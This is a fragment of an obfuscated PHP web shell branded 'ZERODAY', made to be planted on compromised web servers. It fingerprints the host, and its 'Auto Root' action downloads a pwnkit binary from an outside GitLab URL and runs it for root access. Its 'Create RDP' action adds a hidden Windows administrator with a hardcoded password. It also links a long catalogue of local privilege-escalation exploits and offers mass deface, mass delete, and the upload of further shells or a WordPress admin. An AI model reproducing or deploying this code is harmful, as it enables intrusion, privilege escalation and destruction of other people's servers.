<a class='text-decoration-none text-light anu' href='".$_SERVER['PHP_SELF']."'><h1>ZERODAY</h1></a>";if(isset($azu3293050475['path'])){$sol190089999=$azu3293050475['path'];chdir($sol190089999);}else{$sol190089999=$wje845731916();}$sol190089999=str_replace('\\','/',$sol190089999);$oxk2344257041=explode('/',$sol190089999);foreach($oxk2344257041 as $qlb3208210256=>$daz2151571073){if($daz2151571073==''&&$qlb3208210256==0){$fov3904355907=true;echo "<i class='bi bi-hdd-rack'></i>:<a class='text-decoration-none text-light' href='?path=/'>/</a>";continue;}if($daz2151571073=='')continue;echo "<a class='text-decoration-none text-light' href='?path=";for($iie3865851505=0;$iie3865851505<=$qlb3208210256;$iie3865851505++){echo"$oxk2344257041[$iie3865851505]";if($iie3865851505!=$qlb3208210256)echo "/";}echo "'>".$daz2151571073."</a>/";}$oue2843178896=scandir($sol190089999);echo " [ ".w($sol190089999,p($sol190089999))." ]";$sre3688262367=(function_exists('mysql_connect'))?"<gr>ON</gr>":"<rd>OFF</rd>";$tov65018701=(function_exists('curl_version'))?"<gr>ON</gr>":"<rd>OFF</rd>";$mfx3587616859=(exe('wget --help'))?"<gr>ON</gr>":"<rd>OFF</rd>";$uvh719472250=(exe('perl --help'))?"<gr>ON</gr>":"<rd>OFF</rd>";$qjq1195352721=(exe('python --help'))?"<gr>ON</gr>":"<rd>OFF</rd>";$gjz682757169=(exe('gcc --help'))?"<gr>ON</gr>":"<rd>OFF</rd>";$hfc3458825191=(exe('pkexec --version"'))?"<gr>ON</gr>":"<rd>OFF</rd>";$vcm279840682=@ini_get("disable_functions");if(empty($vcm279840682)){$jzk1561703635="<gr>NONE</gr>";}else{$jzk1561703635="<rd>$vcm279840682</rd>";}if(!function_exists('posix_getegid')){$zyw2375276105=@get_current_user();$yjx1402668550=@getmyuid();$fee1278832920=@getmygid();$cvy1841317061="?";}else{$yjx1402668550=@posix_getpwuid(posix_geteuid());$fee1278832920=@posix_getgrgid(posix_getegid());$zyw2375276105=$yjx1402668550['name'];$yjx1402668550=$yjx1402668550['uid'];$cvy1841317061=$fee1278832920['name'];$fee1278832920=$fee1278832920['gid'];}$jyg1992828207=(@ini_get(strtolower("safe_mode"))=='on')?"<rd>ON</rd>":"<gr>OFF</gr>";echo "
<div class='container-fluid'>
<div class='corner'>
<i data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'>Information Server</i>
<!--<form method=post><select name=eviltwin><option selected>Get Localroot All CVE</option><option value=one>CVE-2018-14634 (2.6.x, 3.10.x and 4.14.x)</option><option value=two>Dirty</option><option value=suid>Suid</option><option value=timoutpwn>Timeoutpwn</option><option value=alfa>Alfa (4)</option><option value=noname>Noname (1)</option><option value=ets>Evil Twin (1.3)</option></select><input type=submit value=Get!>-->
</div><br>
<div class='collapse text-dark mb-3' id='collapseExample'>
<div class='box shadow bg-light p-3 rounded-3'>
System: <gr>".php_uname()."</gr><br>
Software: <gr>".$_SERVER["SERVER_SOFTWARE"]."</gr><br>
PHP Version: <gr>".PHP_VERSION."</gr> PHP Os: <gr>".PHP_OS."</gr><br>
Server IP: <gr>".gethostbyname($_SERVER['HTTP_HOST'])."</gr><br>
Your IP: <gr>".ia()."</gr><br>
User: <gr>$zyw2375276105</gr> ($yjx1402668550) | Group: <gr>$cvy1841317061</gr> ($fee1278832920)<br>
Safe Mode: $jyg1992828207<br>
MYSQL: $sre3688262367 | PERL: $uvh719472250 | PYTHON: $qjq1195352721 | WGET: $mfx3587616859 | CURL: $tov65018701 | GCC: $gjz682757169 | PKEXEC: $hfc3458825191<br>
Disable Function:<br><pre>$jzk1561703635</pre>
</div>
</div>
</div>
<div class='text-center'>
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=adminer'><i class='bi bi-cast'></i> Adminer </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=autoroot'><i class='bi bi-bug'></i> Auto Root </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=cmd'><i class='bi bi-terminal'></i> Command </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=rdp'><i class='bi bi-intersect'></i> Create RDP </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=config'><i class='bi bi-tv'></i> Config </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=getools'><i class='bi bi-toggles'></i> Get Shell/Tools </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=getroot'><i class='bi bi-tools'></i> Get Localroot </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=deface'><i class='bi bi-exclamation-diamond'></i> Mass Deface </a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&id=delete'><i class='bi bi-trash'></i> Mass Delete </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=network'><i class='bi bi-hdd-network'></i> Network </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=scanroot'><i class='bi bi-search'></i> Scan Root </a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&id=upload'><i class='bi bi-upload'></i> Upload </a>
<a class='btn btn-outline-light btn-sm' href='https://shizuo.my.id'><i class='bi bi-box-arrow-in-left'></i> Website </a>
</div>
</div>";$jxg3766473888=str_replace($_SERVER['DOCUMENT_ROOT'],"",$sol190089999);if(isset($azu3293050475['dir'])){$oex3131800080=$azu3293050475['dir'];chdir($oex3131800080);}else{$oex3131800080=$wje845731916();}$sol190089999=str_replace('\\','/',$sol190089999);$ycu338269933=explode("/",$oex3131800080);for($iie3865851505=0;$iie3865851505<=$xdm3459532406;$iie3865851505++){$ycu338269933[$iie3865851505];if($iie3865851505!=$xdm3459532406){}if($azu3293050475['id']=='rdp'){ob_implicit_flush();ob_end_flush();if(strtoupper(substr(PHP_OS,0,3))==='WIN'){echo '<center class="anu">Create RDP</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("net user shizuo b4b1raga#1337 /add",$sol190089999).exe_root("net localgroup administrators shizuo /add",$sol190089999).'<br>If there is no "Access is denied." output, chances are that you have succeeded in creating a user here. Just log in using the username and password below.
hosts: <gr>'.gethostbyname($_SERVER["HTTP_HOST"]).'
username: shizuo
password: b4b1raga#1337</code></pre>
</div>
</div>';}else{echo "<script>alert('Whutt?! kids, this tool only works for windows server!');</script>";}}if($azu3293050475['id']=='autoroot'){ob_implicit_flush();ob_end_flush();echo '<center class="anu">Auto Root by shizuo</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("curl https://gitlab.com/jasonrondiguez/a/-/raw/main/localr00000t/pwnkit -o cats;chmod +x cats;./cats id",$sol190089999).'<br>If successful, u can run as root user using command: ./cats "YOUR COMMAND"</code></pre>
</div>
</div>';}if($azu3293050475['id']=='getroot'){ob_implicit_flush();ob_end_flush();s();echo '<center class="anu">Get Localroot</center>';echo "<b>Linux</b><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2001' class='text-decoration-none text-light'>CVE N/A | Sudo prompt overflow in v1.5.7 to 1.6.5p2</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2002' class='text-decoration-none text-light'>CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/blob/master/2003/ptrace-kmod.c' class='text-decoration-none text-light'>CVE-2003-0127 | Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/blob/master/2003/hatorihanzo.c' class='text-decoration-none text-light'>CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2004/CVE-2004-0077' class='text-decoration-none text-light'>CVE-2004-0077 | Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2004/CVE-2004-1235' class='text-decoration-none text-light'>CVE-2004-1235 | Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2004/caps_to_root' class='text-decoration-none text-light'>CVE N/A | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2005/CVE-2005-0736' class='text-decoration-none text-light'>CVE-2005-0736 | Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2005/CVE-2005-1263' class='text-decoration-none text-light'>CVE-2005-1263 | Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2006/CVE-2006-2451' class='text-decoration-none text-light'>CVE-2006-2451 | Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2006/CVE-2006-3626' class='text-decoration-none text-light'>CVE-2006-3626 | Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2007/Compress_Exploit' class='text-decoration-none text-light'>CVE N/A | Compress v4.2.4 local test exploit</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2007/Gawk_Exploit' class='text-decoration-none text-light'>CVE N/A | Local GNU Awk 3.1.0-x proof of concept exploit</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2007/EDB-ID-4756' class='text-decoration-none text-light'>EDB-ID-4756 | Linux Kernel < 2.6.11.5 Bluetooth Stack Localroot Exploit</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2008/CVE-2008-0600' class='text-decoration-none text-light'>CVE-2008-0600 | Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2008/CVE-2008-0900' class='text-decoration-none text-light'>CVE-2008-0900 | Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2008/CVE-2008-4210' class='text-decoration-none text-light'>CVE-2008-4210 | Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-1185' class='text-decoration-none text-light'>CVE-2009-1185 | Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-1337' class='text-decoration-none text-light'>CVE-2009-1337 | Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-2692' class='text-decoration-none text-light'>CVE-2009-2692 | Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-2698' class='text-decoration-none text-light'>CVE-2009-2698 | Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2009/CVE-2009-3547' class='text-decoration-none text-light'>CVE-2009-3547 | Linux 2.6.x fs/pipe.c Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-1146' class='text-decoration-none text-light'>CVE-2010-1146 | ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-2959' class='text-decoration-none text-light'>CVE-2010-2959 | Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-3081' class='text-decoration-none text-light'>CVE-2010-3081 | Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-3301' class='text-decoration-none text-light'>CVE-2010-3301 | Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-3437' class='text-decoration-none text-light'>CVE-2010-3437 | Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-3904' class='text-decoration-none text-light'>CVE-2010-3904 | Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-4073' class='text-decoration-none text-light'>CVE-2010-4073 | Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-4258' class='text-decoration-none text-light'>CVE-2010-4258 | Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2010/CVE-2010-4347' class='text-decoration-none text-light'>CVE-2010-4347 | Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/CVE-2011-1021' class='text-decoration-none text-light'>CVE-2011-1021 | Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/CVE-2011-2777' class='text-decoration-none text-light'>CVE-2011-2777 | Acpid 1:</b><br>2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/CVE-2011-1485' class='text-decoration-none text-light'>CVE-2011-1485 | pkexec - Race Condition Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/EDB-ID-18071' class='text-decoration-none text-light'>EDB-ID-18071 | Calibre E-Book Reader - Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/EDB-ID-17391' class='text-decoration-none text-light'>EDB-ID-17391 | Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2011/EDB-ID-15944' class='text-decoration-none text-light'>EDB-ID-15944 | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2012/CVE-2012-0056' class='text-decoration-none text-light'>CVE-2012-0056 | Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2012/CVE-2012-3524' class='text-decoration-none text-light'>CVE-2012-3524 | libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2012/CVE-2012-0809' class='text-decoration-none text-light'>CVE-2012-0809 | sudo 1.8.0 < 1.8.3p1 - Format String</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2013/CVE-2013-0268' class='text-decoration-none text-light'>CVE-2013-0268 | Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2013/CVE-2013-1763' class='text-decoration-none text-light'>CVE-2013-1763 | Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2013/CVE-2013-1858' class='text-decoration-none text-light'>CVE-2013-1858 | Linux Kernel 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2013/CVE-2013-2094' class='text-decoration-none text-light'>CVE-2013-2094 | Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-0038' class='text-decoration-none text-light'>CVE-2014-0038 | Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-0196' class='text-decoration-none text-light'>CVE-2014-0196 | Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-3153' class='text-decoration-none text-light'>CVE-2014-3153 | Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-4014' class='text-decoration-none text-light'>CVE-2014-4014 | Linux Kernel 3.13 - SGID Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-4699' class='text-decoration-none text-light'>CVE-2014-4699 | Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2014/CVE-2014-5284' class='text-decoration-none text-light'>CVE-2014-5284 | OSSEC 2.8 - 'hosts.deny' Local Privilege Escalation
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2015/CVE-2015-1328' class='text-decoration-none text-light'>CVE-2015-1328 | Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2015/CVE-2015-7547' class='text-decoration-none text-light'>CVE-2015-7547 | glibc - 'getaddrinfo' Stack Buffer Overflow (PoC)
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-0728' class='text-decoration-none text-light'>CVE-2016-0728 | Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-2384' class='text-decoration-none text-light'>CVE-2016-2384 | Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-5195' class='text-decoration-none text-light'>CVE-2016-5195 | Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-8655' class='text-decoration-none text-light'>CVE-2016-8655 | Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2016/CVE-2016-9793' class='text-decoration-none text-light'>CVE-2016-9793 | Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-5123' class='text-decoration-none text-light'>CVE-2017-5123 | Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-6074' class='text-decoration-none text-light'>CVE-2017-6074 | Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-7308' class='text-decoration-none text-light'>CVE-2017-7308 | Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-7494' class='text-decoration-none text-light'>CVE-2017-7494 | Samba 3.5.0 - Remote Code Execution</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-7533' class='text-decoration-none text-light'>CVE-2017-7533 | Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-16939' class='text-decoration-none text-light'>CVE-2017-16939 | Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-16995' class='text-decoration-none text-light'>CVE-2017-16995 | Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-1000112' class='text-decoration-none text-light'>CVE-2017-1000112 | Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2017/CVE-2017-1000367' class='text-decoration-none text-light'>CVE-2017-1000367 | Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2018/CVE-2018-1000001' class='text-decoration-none text-light'>CVE-2018-1000001 | glibc < 2.26 - 'getcwd()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2019/CVE-2019-7304' class='text-decoration-none text-light'>CVE-2019-7304 | snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/2019/CVE-2019-13272' class='text-decoration-none text-light'>CVE-2019-13272 | Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation</a><br>
<b>IBM AIX</b><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/IBM%20AIX' class='text-decoration-none text-light'>CVE-2013-4011 - IBM AIX 6.1 / 7.1 Localroot Privilege Escalation</a><br>
<b>FreeBSD</b><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2005/EDB-ID-1311' class='text-decoration-none text-light'>EDB-ID-1311 | FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2008/CVE-2008-3531' class='text-decoration-none text-light'>CVE-2008-3531 | FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2008/CVE-2008-5736' class='text-decoration-none text-light'>CVE-2008-5736 | FreeBSD 6.4 - Netgraph Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2009/CVE-2009-3527' class='text-decoration-none text-light'>CVE-2009-3527 | FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2009/CVE-2009-4146' class='text-decoration-none text-light'>CVE-2009-4146 | FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2009/EDB-ID-9860' class='text-decoration-none text-light'>EDB-ID-9860 | FreeBSD 7.2 - VFS/devfs Race Condition</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2010/CVE-2010-2020' class='text-decoration-none text-light'>CVE-2010-2020 | FreeBSD 8.0/7.3/7.2 - 'nfs_mount()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2010/CVE-2010-2693' class='text-decoration-none text-light'>CVE-2010-2693 | FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2010/CVE-2010-4210' class='text-decoration-none text-light'>CVE-2010-4210 | FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2011/CVE-2011-4062' class='text-decoration-none text-light'>CVE-2011-4062 | FreeBSD - UIPC socket heap Overflow (PoC)</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2011/CVE-2011-4122' class='text-decoration-none text-light'>CVE-2011-4122 | OpenPAM - 'pam_start()' Local Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2011/CVE-2011-4862' class='text-decoration-none text-light'>CVE-2011-4862 | TelnetD encrypt_keyid - Function Pointer Overwrite</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2012/CVE-2012-0217' class='text-decoration-none text-light'>CVE-2012-0217 | FreeBSD 8.3 - 9.0 amd64 Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2012/EDB-ID-28718' class='text-decoration-none text-light'>EDB-ID-28718 | FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation</a><br>
<a href='https://github.com/Snoopy-Sec/Localroot-ALL-CVE/tree/master/FreeBSD/2013/CVE-2013-2171' class='text-decoration-none text-light'>CVE-2013-2171 | FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation</a><br>
";}if($azu3293050475['id']=='getools'){ob_implicit_flush();ob_end_flush();s();echo '<center class="anu">Get Tools</center>';echo "
<div class='text-center'>
<div class='btn-group mb-3'>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=wso'><i class='bi bi-peace'></i> Wso Shell </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=alfa'><i class='bi bi-peace'></i> Alfa Tesla Shell </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=marijuana'><i class='bi bi-peace'></i> Marijuana Shell </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=wpadd'><i class='bi bi-peace'></i> WP Add Admin </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=shellscan'><i class='bi-peace'></i> Shell Scanner </a>
<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=csrf'><i class='bi bi-peace'></i> CSRF </a>
</div>
